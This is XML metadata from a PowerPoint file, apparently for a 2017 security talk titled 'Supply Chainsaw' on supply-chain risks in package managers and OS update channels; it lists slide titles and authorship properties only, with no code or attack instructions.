      <vt:lpstr>NPM: Post-Exploit Power</vt:lpstr>
      <vt:lpstr>Next step</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NPM Experiment</vt:lpstr>
      <vt:lpstr>Commercial offerings</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>RubyGems: The Ruby Package Manger</vt:lpstr>
      <vt:lpstr>RubyGems: The Ruby Package Manger</vt:lpstr>
      <vt:lpstr>RubyGems: The Ruby Package Manger</vt:lpstr>
      <vt:lpstr>RubyGems: Registration</vt:lpstr>
      <vt:lpstr>RubyGems: Targeting popular packages</vt:lpstr>
      <vt:lpstr>RubyGems: Submitting A Package</vt:lpstr>
      <vt:lpstr>Ruby: Code Execution On Gem Install</vt:lpstr>
      <vt:lpstr>RubyGems: Post-Exploit Power</vt:lpstr>
      <vt:lpstr>RubyGems: The Good Parts</vt:lpstr>
      <vt:lpstr>RubyGems: Signing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CRAN</vt:lpstr>
      <vt:lpstr>CRAN: Targeting popular packages</vt:lpstr>
      <vt:lpstr>CRAN: Package Submission</vt:lpstr>
      <vt:lpstr>CRAN: Replacing popular packages</vt:lpstr>
      <vt:lpstr>Installing R and packages</vt:lpstr>
      <vt:lpstr>CRAN: Mirrors</vt:lpstr>
      <vt:lpstr>CRAN: Mirrors</vt:lpstr>
      <vt:lpstr>CRAN: Mirror stats</vt:lpstr>
      <vt:lpstr>Is typosquatting in the wild?</vt:lpstr>
      <vt:lpstr>Operating Systems</vt:lpstr>
      <vt:lpstr>Homebrew</vt:lpstr>
      <vt:lpstr>Brew Packages (“formulae”)</vt:lpstr>
      <vt:lpstr>Installing Brew</vt:lpstr>
      <vt:lpstr>Honorable mention</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Linux Mint</vt:lpstr>
      <vt:lpstr>Linux Mint</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Debian</vt:lpstr>
      <vt:lpstr>Debian</vt:lpstr>
      <vt:lpstr>Debian</vt:lpstr>
      <vt:lpstr>Debian Mirror</vt:lpstr>
      <vt:lpstr>Debian Mirrors</vt:lpstr>
      <vt:lpstr>Slightly related gripe</vt:lpstr>
      <vt:lpstr>Mac OS Sierra</vt:lpstr>
      <vt:lpstr>Windows 10</vt:lpstr>
      <vt:lpstr>Windows 10</vt:lpstr>
      <vt:lpstr>MITM Opportunities</vt:lpstr>
      <vt:lpstr>MITM’able stats</vt:lpstr>
      <vt:lpstr>In-the-wild Chrome extensions</vt:lpstr>
      <vt:lpstr>Cloud Platforms</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary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Supply Chainsaw</dc:title>
  <dc:creator>sandbox</dc:creator>
  <cp:lastModifiedBy>Matt Weeks</cp:lastModifiedBy>
  <cp:revision>188</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-09-17T20:33:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-19T21:23:06Z</dcterms:modified>
</cp:coreProperties>
</file>